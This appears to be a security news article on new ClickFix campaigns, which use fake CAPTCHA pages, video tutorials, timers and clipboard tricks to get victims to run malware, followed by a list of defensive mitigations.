editorially independent. We may make money when you click on links
to our partners.
Learn More
Cybercriminals continue to refine social engineering techniques, and the latest evolution of the ClickFix malware campaign demonstrates how far deception has advanced.
According to researchers at Push Security, new variants of ClickFix attacks now feature video tutorials, countdown timers, and automatic operating system detection, all designed to trick users into infecting their own systems.
A New Spin on an Old Trick
ClickFix attacks have been active for several years, typically relying on a simple yet highly effective social engineering tactic: convincing victims to paste and execute malicious code on their own devices.
The new campaign maintains that same core method but has added multiple layers of sophistication to increase success rates.
Traditionally, ClickFix pages displayed text instructions claiming to verify a user’s identity or fix a supposed software issue.
Victims were told to copy code from a webpage and run it in their terminal or command prompt — actions that would silently download and execute malware.
However, recent campaigns identified by Push Security researchers replace these static instructions with embedded video tutorials that walk users through the process of running the malicious code.
The inclusion of video makes the attack feel more authentic and interactive, lowering skepticism and reducing the chance of user error.
Manipulation Through Design
The new ClickFix webpages resemble Cloudflare CAPTCHA verification screens, complete with realistic logos, design elements, and interactive elements.
Behind the scenes, JavaScript scripts automatically detect the victim’s operating system — Windows, macOS, or Linux — and adjust the malicious commands accordingly.
Once a user lands on the page, the fake verification screen begins a one-minute countdown timer, adding psychological pressure and urgency.
Users are told they must complete the verification within the time limit to continue accessing the website.
A “users verified in the last hour” counter further reinforces the illusion of legitimacy by implying that others have completed the same process safely.
Push Security reports that the malicious JavaScript can also automatically copy commands to the clipboard, allowing users to paste and execute the payload without ever seeing the actual code.
This automation minimizes the likelihood of mistakes that could alert the victim.
Multi-Platform Capabilities
Earlier versions of ClickFix were already known to target all major operating systems, but the new campaigns introduce dynamic instruction delivery that tailors payloads to each environment.
For Windows users, ClickFix often employs MSHTA or PowerShell scripts, leveraging built-in Windows components to fetch and execute the payload.
On macOS and Linux, attackers rely on shell commands and living-off-the-land binaries that do not trigger standard antivirus or endpoint detection alerts.
Push Security notes that many of these malicious pages are distributed through malvertising on Google Search, where attackers purchase ads or use SEO poisoning to push infected sites higher in results.
Some actors also compromise legitimate websites through vulnerable WordPress plugins, injecting their JavaScript payloads directly into trusted pages.
The Next Phase of ClickFix
Researchers warn that future versions of ClickFix may run entirely in the browser, allowing malicious code execution without requiring the victim to open a terminal.
This browser-based evolution would make detection even harder, as endpoint detection and response (EDR) tools typically focus on monitoring system-level processes, not in-browser activity.
The payloads associated with ClickFix attacks vary, but information-stealing malware remains the most common.
These infostealers are designed to collect browser credentials, cryptocurrency wallet data, and system information, which can then be sold on dark web marketplaces or used for follow-up attacks.
Building Resilience Against ClickFix
Defending against ClickFix requires both technical controls and user awareness, as the attack primarily relies on social engineering rather than just software vulnerabilities. Key mitigations include:
- Educate users on social engineering tactics: Reinforce that no legitimate website or service will ever ask users to paste or execute terminal commands for verification.
- Block malvertising and SEO poisoning sources: Use ad blockers, safe browsing tools, and DNS filtering to prevent redirection to malicious sites.
- Monitor clipboard and command-line activity: Implement endpoint monitoring for suspicious PowerShell, MSHTA, or shell executions initiated by browsers.
- Patch on a regular basis: Keep WordPress plugins, themes, and CMS components updated to prevent attackers from injecting malicious scripts into legitimate sites.
- Use browser isolation or sandboxing: Separate web browsing activity from the host operating system to reduce exposure to in-browser exploitation.
- Deploy web filtering and threat intelligence: Leverage URL categorization and known IoC feeds to block access to ClickFix-related domains.
These mitigations can help build cyber resilience against ClickFix attacks.
ClickFix’s success lies not just in sophisticated malware, but in manipulating human behavior.
By combining visual trust cues, urgency, and automation, the attackers effectively bypass many traditional security defenses.
This growing ability to exploit human trust reinforces why adopting zero-trust principles is essential to counter emerging threats.
